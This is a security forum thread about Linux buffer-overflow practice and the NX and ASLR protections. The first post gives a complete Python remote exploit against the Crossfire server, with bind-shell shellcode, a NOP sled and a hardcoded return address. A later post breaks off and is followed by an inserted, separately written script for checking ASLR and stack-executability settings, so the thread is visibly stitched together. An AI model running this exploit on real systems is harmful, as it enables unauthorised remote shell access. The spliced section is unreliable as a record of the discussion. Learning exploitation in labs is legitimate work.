Linux Memory Protection

This topic contains 6 replies, has 5 voices, and was last updated by Henry864 3 years, 1 month ago.

  • #8506
     zaixer 
    Participant

    Hi all,

    I am practicing Linux bof exploitation. When trying to exploit a vulnerability in crossfire, everything works well: I get the shellcode placed in the right place, and the program flow gets redirected to the shellcode. However, when it starts executing the shellcode, the program fails.

    OS version (bt5 R3):
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

    exploit code:
    #!/usr/bin/python
    import socket, sys
    host = sys.argv[1]

    #0x8134e77 jump eax
    #0xb7dadad6 nop sled address

    shellcode = ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
    "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80")

    crash = "\x90" * 199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7

    buffer = "\x11(setup sound " + crash + "\x90\x00#"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[*]Sending evil buffer..."
    s.connect((host, 13327))
    print (s.recv(1024))

    s.send(buffer)
    s.close()
    print "[*]Payload Sent !"
    ====================================================================================================================

    I placed a breakpoint before the shellcode and the execution flow hits it successfully; however, after continuing, the program crashes and gives the following message:

    "Program received signal SIGSEGV, Segmentation fault.
    0xb7daeb36 in ?? ()"

    When inspecting this address, it's full of zeros!

    I already disabled ASLR before starting the exercise, and I am wondering whether any other protection mechanism exists that prevents exploitation?

  • #53214
     dynamik 
    Participant

    DEP? Maybe try an older Distro like Ubuntu 7.04.

    Also, have you filtered out bad characters? Does your shellcode arrive completely intact?

  • #53215
     m0wgli 
    Participant

    @zaixer wrote:

    I already disabled ASLR before starting the exercise, and I am wondering whether any other protection mechanism exists that prevents exploitation?

    Are you doing the Offensive Security – Penetration Testing with BackTrack (PWB) course?

  • #53216
     zaixer 
    Participant

    I think DEP is Windows based and NX is Linux based... please correct me if I am wrong. The point is not only to make it work; it's about understanding why it did not work :). I do not like leaving it just because it did not work 🙂

  • #53217
     testdotphp 
    Participant

    @zaixer wrote:

    I think DEP is windows based and NX is linux based…correct me please if I am wrong.

    DEP is not Windows only and is even supported by phone OSes like iOS and Android.
    Also, the "never execute bit" is part of the CPU and is supported by quite a few operating systems now. The never execute bit was a large part of the MS08-067 "thing" as well.

  • #53218
     Henry864 
    Participant

    Is there a way to check which memory protection mechanism is used by the OS?

    I have a program that fails with a segmentation fault on one computer (Ubuntu) but not on another (RH6).

    One of the explanations was the memory protection mechanism used by the OS. Is there a way I can find / change it?

    Thanks,
    http://academy.ehacking.net/

  • #53219
     Henry864 
    Participant

    Until recently the exact model of how ASLR and other memory protection mechanisms work on Linux was something that I knew only at a high level. Recently I've done a lot of work where I've had the need to bypass these mechanisms (in a cooperative setting), and I want to explain for readers exactly how the memory protection model on x86/Linux systems works, what it protects against, and the ways it can be bypassed.

    There are two major mechanisms in place to protect memory access that are turned on by default on most x86-64 Linux systems. The first is the so-called NX bit, which is a setting that gives finer-grained permissions to mapped memory regions. The second is address space layout randomization (ASLR), which randomizes where certain parts of a program are loaded into memory. I'll discuss these two topics separately since they are complementary but completely orthogonal to one another.
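Henry864 asked in the previous post how to tell which memory protection mechanism a given Linux box is using, and the post above names the two that matter here: the NX bit and ASLR. The script below is an added example, not code posted in this thread, that reads both settings the way a defender or a student would check them: the kernel-wide ASLR level from /proc/sys/kernel/randomize_va_space, the per-binary stack-permission request recorded in the ELF PT_GNU_STACK program header (what `readelf -l` shows as the GNU_STACK flags), and the live permissions of the [stack] mapping in /proc/self/maps. The /proc paths and ELF layout are standard Linux; the sample maps lines and the minimal ELF image are constructed inline so the checker functions can be exercised without a real binary.

```python
#!/usr/bin/env python3
"""Inspect the two protections discussed in this thread on a Linux host:
ASLR (kernel-wide sysctl) and NX / non-executable stack (per-binary ELF flag
and the permissions of the live stack mapping)."""
import struct
import sys

PT_GNU_STACK = 0x6474E551   # program header type that records the requested stack permissions
PF_X = 0x1                  # p_flags bit: mapping is executable

ASLR_LEVELS = {
    0: "disabled: stack, mmap and heap land at fixed addresses",
    1: "conservative: stack, mmap base, VDSO and shared libraries randomized",
    2: "full: as 1, plus a randomized brk/heap base",
}


def aslr_setting(sysctl_text):
    """Interpret the contents of /proc/sys/kernel/randomize_va_space."""
    level = int(sysctl_text.strip())
    return level, ASLR_LEVELS.get(level, "unknown value")


def gnu_stack_executable(elf_bytes):
    """Read the ELF program headers and report the PT_GNU_STACK request:
    True  -> stack requested executable (e.g. linked with -z execstack)
    False -> stack requested non-executable (the normal modern default)
    None  -> no PT_GNU_STACK header; the kernel then uses its architecture default."""
    if elf_bytes[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    endian = "<" if elf_bytes[5] == 1 else ">"
    if elf_bytes[4] == 1:        # ELF32: e_phoff at 0x1C, e_phentsize/e_phnum at 0x2A
        e_phoff, = struct.unpack_from(endian + "I", elf_bytes, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf_bytes, 0x2A)
        flags_offset = 24        # Elf32_Phdr: p_flags comes after six 4-byte fields
    elif elf_bytes[4] == 2:      # ELF64: e_phoff at 0x20, e_phentsize/e_phnum at 0x36
        e_phoff, = struct.unpack_from(endian + "Q", elf_bytes, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf_bytes, 0x36)
        flags_offset = 4         # Elf64_Phdr: p_flags immediately follows p_type
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from(endian + "I", elf_bytes, base)
        if p_type == PT_GNU_STACK:
            p_flags, = struct.unpack_from(endian + "I", elf_bytes, base + flags_offset)
            return bool(p_flags & PF_X)
    return None


def executable_stack_in_maps(maps_text):
    """Scan /proc/<pid>/maps text; True/False for the [stack] mapping's x bit, None if absent."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[5] == "[stack]":
            return "x" in fields[1]
    return None


def build_sample_elf32(stack_executable):
    """Constructed sample (not a real program): an ELF32 little-endian header plus one
    PT_GNU_STACK program header, just enough structure for gnu_stack_executable()."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    # e_type=EXEC, e_machine=i386, e_version, e_entry, e_phoff=52, e_shoff, e_flags,
    # e_ehsize=52, e_phentsize=32, e_phnum=1, e_shentsize, e_shnum, e_shstrndx
    header = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    flags = 0x6 | (PF_X if stack_executable else 0)      # RW, plus X when requested
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, flags, 16)
    return header + phdr


# Constructed /proc/<pid>/maps excerpts: one with an NX stack, one with an executable stack.
SAMPLE_MAPS_NX = (
    "08048000-08062000 r-xp 00000000 08:01 12345      /opt/example/server\n"
    "bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]\n"
)
SAMPLE_MAPS_EXEC = SAMPLE_MAPS_NX.replace("rw-p 00000000 00:00 0", "rwxp 00000000 00:00 0")


def main(argv):
    """Report the live ASLR level, this process's stack permissions and, for each
    path given on the command line, that binary's PT_GNU_STACK setting."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            level, meaning = aslr_setting(f.read())
        print(f"randomize_va_space = {level}: {meaning}")
        with open("/proc/self/maps") as f:
            print("this process's stack is executable:", executable_stack_in_maps(f.read()))
    except OSError as e:
        print("procfs not available (not Linux?):", e)
    for path in argv[1:]:
        with open(path, "rb") as f:
            print(f"{path}: PT_GNU_STACK executable = {gnu_stack_executable(f.read())}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 memprot.py /path/to/binary` on each of the two machines Henry864 compared: a different randomize_va_space value, or a PT_GNU_STACK flag that differs between the two builds, is exactly the kind of difference that makes a stack-smashing program fault on one host and not the other. Changing the ASLR level is a matter of writing 0, 1 or 2 to the same sysctl file; the stack-executable request is a link-time property of the binary, not an OS setting.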


Copyright ©2019 Caendra, Inc.
